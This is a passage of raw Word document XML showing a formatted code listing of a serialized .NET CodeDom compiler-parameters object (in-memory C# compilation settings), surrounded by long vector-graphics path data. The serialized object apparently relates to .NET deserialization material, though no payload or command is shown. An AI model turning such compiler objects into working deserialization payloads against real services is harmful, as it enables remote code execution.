        <w:t>  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embeddedResources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11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xmlns:d3p1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="13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"http://schemas.microsoft.com/2003/10/S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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>erialization/Arrays"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xmlns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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"http://schemas.datacontract.org/2004/07/Syste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m.CodeDom.Compiler"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/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  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evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13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xmlns:d3p1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"http://schemas.datacontract.org/2004/07/System.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Security.Policy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="14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i:nil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"true"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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xmlns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"http://schemas.datacontract.org/200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4/07/System.CodeDom.Compiler"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/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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12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generateExecutable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13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xmlns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"http://schemas.datacontract.org/2004/07/Sy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stem.CodeDom.Compiler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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false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&lt;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generateExecutable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  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generateInMemory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11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xmlns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"http://schemas.datacontract.org/2004/07/Syst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em.CodeDom.Compiler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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true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&lt;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generateInMemory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&gt;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14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includeDebugInformation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10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xmlns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"http://schemas.datacontract.org/2004/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07/System.CodeDom.Compiler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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false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&lt;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includeDebugInformation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  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linkedResources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13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xmlns:d3p1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"http://schemas.microsoft.com/2003/10/Ser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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ialization/Arrays"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xmlns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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"http://schemas.datacontract.org/2004/07/System.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CodeDom.Compiler"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/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t>  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mainClass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i:nil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"true"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xmlns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"http://schemas.datacontract.org/2004/0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7/System.CodeDom.Compiler"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/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&gt;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17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t>  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outputName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12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xmlns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"http://schemas.datacontract.org/2004/07/System.Cod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eDom.Compiler"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&gt;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&lt;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outputName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&gt;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18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t>  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tempFiles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i:nil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"true"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xmlns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"http://schemas.datacontract.org/2004/0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7/System.CodeDom.Compiler"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/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&gt;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459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19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treatWarningsAsErrors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10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xmlns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"http://schemas.datacontract.org/2004/0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7/System.CodeDom.Compiler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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false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&lt;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treatWarningsAsErrors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  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warningLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="14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xmlns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"http://schemas.datacontract.org/2004/07/System.C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odeDom.Compiler"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&gt;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‐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1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warningLevel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&gt;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21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t>  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win32Resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10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i:nil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"true"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xmlns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"http://schemas.datacontract.org/20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04/07/System.CodeDom.Compiler"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/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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22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d2p1:checkTypes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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false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&lt;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d2p1:checkTypes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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23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d2p1:compileWithNoCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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false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&lt;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d2p1:compileWithNoCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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24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d2p1:compilerOptions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i:nil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"true"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/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&gt;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25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d2p1:generateCCU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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false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&lt;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d2p1:generateCCU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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26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d2p1:languageToUse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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CSharp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&lt;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d2p1:languageToUse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121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27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d2p1:libraryPaths</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11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xmlns:d3p1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"http://schemas.microsoft.com/2003/10/S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erialization/Arrays"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i:nil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"true"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/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&gt;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28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d2p1:localAssembly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10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xmlns:d3p1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"http://schemas.datacontract.org/2004/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07/System.Reflection"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i:nil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"true"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/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141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29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d2p1:mtInfo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i:nil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"true"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/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136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30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d2p1:userCodeCCUs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11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xmlns:d3p1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"http://schemas.datacontract.org/2004/0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7/System.CodeDom"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i:nil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"true"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/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141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31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t>  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&lt;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parameters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&gt;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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="90"/>
        </w:rPr>
        <w:t>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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CompilerInput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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520.111pt;margin-top:92.21pt;width:0.0pt;height:749.978pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,1840" coordsize="0,14999">
        <v:shape style="position:absolute;left:10402;top:1840;width:0;height:14999" coordorigin="10402,1840" coordsize="0,14999" path="m10402,1840l10402,1840,10402,1840,10402,1840,10402,1840,10402,1840,10402,1841,10402,1842,10402,1843,10402,1844,10402,1846,10402,1849,10402,1852,10402,1855,10402,1859,10402,1864,10402,1870,10402,1876,10402,1884,10402,1892,10402,1901,10402,1911,10402,1922,10402,1935,10402,1948,10402,1963,10402,1979,10402,1996,10402,2015,10402,2035,10402,2057,10402,2080,10402,2105,10402,2132,10402,2160,10402,2190,10402,2222,10402,2255,10402,2291,10402,2328,10402,2368,10402,2410,10402,2453,10402,2499,10402,2548,10402,2598,10402,2651,10402,2706,10402,2764,10402,2824,10402,2887,10402,2953,10402,3021,10402,3091,10402,3165,10402,3242,10402,3321,10402,3403,10402,3488,10402,3577,10402,3668,10402,3763,10402,3860,10402,3961,10402,4066,10402,4173,10402,4284,10402,4399,10402,4517,10402,4639,10402,4764,10402,4893,10402,5026,10402,5162,10402,5303,10402,5447,10402,5595,10402,5747,10402,5904,10402,6064,10402,6228,10402,6397,10402,6570,10402,6748,10402,6929,10402,7116,10402,7306,10402,7501,10402,7701,10402,7906,10402,8115,10402,8329,10402,8547,10402,8771,10402,8999,10402,9233,10402,9471,10402,9715,10402,9964,10402,10217,10402,10477,10402,10741,10402,11011,10402,11286,10402,11566,10402,11852,10402,12144,10402,12441,10402,12744,10402,13053,10402,13367,10402,13687,10402,14013,10402,14345,10402,14683,10402,15027,10402,15377,10402,15733,10402,16096,10402,16465,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:91.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1830" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1830;width:8990;height:390" coordorigin="1490,1830" coordsize="8990,390" path="m1510,1840l1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1511,1840,1512,1840,1512,1840,1514,1840,1515,1840,1517,1840,1519,1840,1521,1840,1524,1840,1528,1840,1532,1840,1536,1840,1541,1840,1546,1840,1552,1840,1559,1840,1566,1840,1575,1840,1583,1840,1593,1840,1603,1840,1615,1840,1627,1840,1640,1840,1654,1840,1668,1840,1684,1840,1701,1840,1719,1840,1738,1840,1758,1840,1780,1840,1802,1840,1826,1840,1851,1840,1877,1840,1904,1840,1933,1840,1963,1840,1995,1840,2028,1840,2063,1840,2099,1840,2136,1840,2175,1840,2216,1840,2259,1840,2303,1840,2348,1840,2396,1840,2445,1840,2496,1840,2549,1840,2604,1840,2660,1840,2719,1840,2779,1840,2841,1840,2906,1840,2972,1840,3041,1840,3112,1840,3184,1840,3259,1840,3336,1840,3416,1840,3498,1840,3582,1840,3668,1840,3757,1840,3848,1840,3941,1840,4037,1840,4136,1840,4236,1840,4340,1840,4446,1840,4555,1840,4666,1840,4780,1840,4897,1840,5017,1840,5139,1840,5264,1840,5392,1840,5523,1840,5657,1840,5793,1840,5933,1840,6076,1840,6222,1840,6370,1840,6522,1840,6677,1840,6835,1840,6997,1840,7161,1840,7329,1840,7500,1840,7675,1840,7853,1840,8034,1840,8219,1840,8407,1840,8598,1840,8793,1840,8992,1840,9194,1840,9400,1840,9609,1840,9823,1840,10039,1840,10260,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1841,10484,1841,10484,1841,10484,1841,10484,1841,10484,1842,10484,1842,10484,1842,10484,1842,10484,1843,10484,1843,10484,1844,10484,1844,10484,1844,10484,1845,10484,1846,10484,1846,10484,1847,10484,1848,10484,1848,10484,1849,10484,1850,10484,1851,10484,1852,10484,1853,10484,1854,10484,1855,10484,1856,10484,1857,10484,1858,10484,1860,10484,1861,10484,1862,10484,1864,10484,1866,10484,1867,10484,1869,10484,1871,10484,1872,10484,1874,10484,1876,10484,1878,10484,1881,10484,1883,10484,1885,10484,1887,10484,1890,10484,1892,10484,1895,10484,1898,10484,1901,10484,1904,10484,1906,10484,1910,10484,1913,10484,1916,10484,1919,10484,1923,10484,1926,10484,1930,10484,1934,10484,1938,10484,1942,10484,1946,10484,1950,10484,1954,10484,1958,10484,1963,10484,1968,10484,1972,10484,1977,10484,1982,10484,1987,10484,1992,10484,1998,10484,2003,10484,2009,10484,2014,10484,2020,10484,2026,10484,2032,10484,2038,10484,2045,10484,2051,10484,2058,10484,2065,10484,2071,10484,2078,10484,2086,10484,2093,10484,2100,10484,2108,10484,2116,10484,2124,10484,2132,10484,2140,10484,2148,10484,2157,10484,2165,10484,2174,10484,2183,10484,2192,10484,2201,10484,2211,10484,2220,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10483,2230,10482,2230,10482,2230,10480,2230,10479,2230,10477,2230,10475,2230,10473,2230,10470,2230,10466,2230,10462,2230,10458,2230,10453,2230,10448,2230,10442,2230,10435,2230,10428,2230,10419,2230,10411,2230,10401,2230,10391,2230,10379,2230,10367,2230,10354,2230,10340,2230,10326,2230,10310,2230,10293,2230,10275,2230,10256,2230,10236,2230,10215,2230,10192,2230,10168,2230,10143,2230,10117,2230,10090,2230,10061,2230,10031,2230,9999,2230,9966,2230,9931,2230,9895,2230,9858,2230,9819,2230,9778,2230,9735,2230,9691,2230,9646,2230,9598,2230,9549,2230,9498,2230,9445,2230,9391,2230,9334,2230,9275,2230,9215,2230,9153,2230,9088,2230,9022,2230,8953,2230,8883,2230,8810,2230,8735,2230,8658,2230,8578,2230,8497,2230,8413,2230,8326,2230,8238,2230,8146,2230,8053,2230,7957,2230,7859,2230,7758,2230,7654,2230,7548,2230,7439,2230,7328,2230,7214,2230,7097,2230,6977,2230,6855,2230,6730,2230,6602,2230,6471,2230,6337,2230,6201,2230,6061,2230,5918,2230,5773,2230,5624,2230,5472,2230,5317,2230,5159,2230,4997,2230,4833,2230,4665,2230,4494,2230,4319,2230,4141,2230,3960,2230,3776,2230,3587,2230,3396,2230,3201,2230,3002,2230,2800,2230,2594,2230,2385,2230,2172,2230,1955,2230,1734,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2229,1510,2229,1510,2229,1510,2229,1510,2229,1510,2229,1510,2228,1510,2228,1510,2228,1510,2227,1510,2227,1510,2227,1510,2226,1510,2226,1510,2225,1510,2224,1510,2224,1510,2223,1510,2223,1510,2222,1510,2221,1510,2220,1510,2219,1510,2218,1510,2217,1510,2216,1510,2215,1510,2214,1510,2213,1510,2212,1510,2210,1510,2209,1510,2208,1510,2206,1510,2205,1510,2203,1510,2201,1510,2199,1510,2198,1510,2196,1510,2194,1510,2192,1510,2189,1510,2187,1510,2185,1510,2183,1510,2180,1510,2178,1510,2175,1510,2172,1510,2169,1510,2167,1510,2164,1510,2160,1510,2157,1510,2154,1510,2151,1510,2147,1510,2144,1510,2140,1510,2136,1510,2132,1510,2128,1510,2124,1510,2120,1510,2116,1510,2112,1510,2107,1510,2102,1510,2098,1510,2093,1510,2088,1510,2083,1510,2078,1510,2072,1510,2067,1510,2061,1510,2056,1510,2050,1510,2044,1510,2038,1510,2032,1510,2025,1510,2019,1510,2012,1510,2005,1510,1999,1510,1992,1510,1984,1510,1977,1510,1970,1510,1962,1510,1954,1510,1946,1510,1938,1510,1930,1510,1922,1510,1913,1510,1905,1510,1896,1510,1887,1510,1878,1510,1869,1510,1859,1510,1850,1510,1840e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:90.599pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId17" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:110.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2210" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2210;width:8990;height:370" coordorigin="1490,2210" coordsize="8990,370" path="m1510,2230l1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1511,2230,1512,2230,1512,2230,1514,2230,1515,2230,1517,2230,1519,2230,1521,2230,1524,2230,1528,2230,1532,2230,1536,2230,1541,2230,1546,2230,1552,2230,1559,2230,1566,2230,1575,2230,1583,2230,1593,2230,1603,2230,1615,2230,1627,2230,1640,2230,1654,2230,1668,2230,1684,2230,1701,2230,1719,2230,1738,2230,1758,2230,1780,2230,1802,2230,1826,2230,1851,2230,1877,2230,1904,2230,1933,2230,1963,2230,1995,2230,2028,2230,2063,2230,2099,2230,2136,2230,2175,2230,2216,2230,2259,2230,2303,2230,2348,2230,2396,2230,2445,2230,2496,2230,2549,2230,2604,2230,2660,2230,2719,2230,2779,2230,2841,2230,2906,2230,2972,2230,3041,2230,3112,2230,3184,2230,3259,2230,3336,2230,3416,2230,3498,2230,3582,2230,3668,2230,3757,2230,3848,2230,3941,2230,4037,2230,4136,2230,4236,2230,4340,2230,4446,2230,4555,2230,4666,2230,4780,2230,4897,2230,5017,2230,5139,2230,5264,2230,5392,2230,5523,2230,5657,2230,5793,2230,5933,2230,6076,2230,6222,2230,6370,2230,6522,2230,6677,2230,6835,2230,6997,2230,7161,2230,7329,2230,7500,2230,7675,2230,7853,2230,8034,2230,8219,2230,8407,2230,8598,2230,8793,2230,8992,2230,9194,2230,9400,2230,9609,2230,9823,2230,10039,2230,10260,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2231,10484,2231,10484,2231,10484,2231,10484,2231,10484,2231,10484,2232,10484,2232,10484,2232,10484,2232,10484,2233,10484,2233,10484,2233,10484,2234,10484,2234,10484,2235,10484,2235,10484,2236,10484,2236,10484,2237,10484,2238,10484,2239,10484,2239,10484,2240,10484,2241,10484,2242,10484,2243,10484,2244,10484,2245,10484,2246,10484,2247,10484,2248,10484,2250,10484,2251,10484,2252,10484,2254,10484,2255,10484,2257,10484,2258,10484,2260,10484,2262,10484,2264,10484,2266,10484,2268,10484,2270,10484,2272,10484,2274,10484,2276,10484,2279,10484,2281,10484,2284,10484,2286,10484,2289,10484,2292,10484,2294,10484,2297,10484,2300,10484,2303,10484,2307,10484,2310,10484,2313,10484,2317,10484,2320,10484,2324,10484,2328,10484,2332,10484,2336,10484,2340,10484,2344,10484,2348,10484,2352,10484,2357,10484,2361,10484,2366,10484,2371,10484,2376,10484,2381,10484,2386,10484,2391,10484,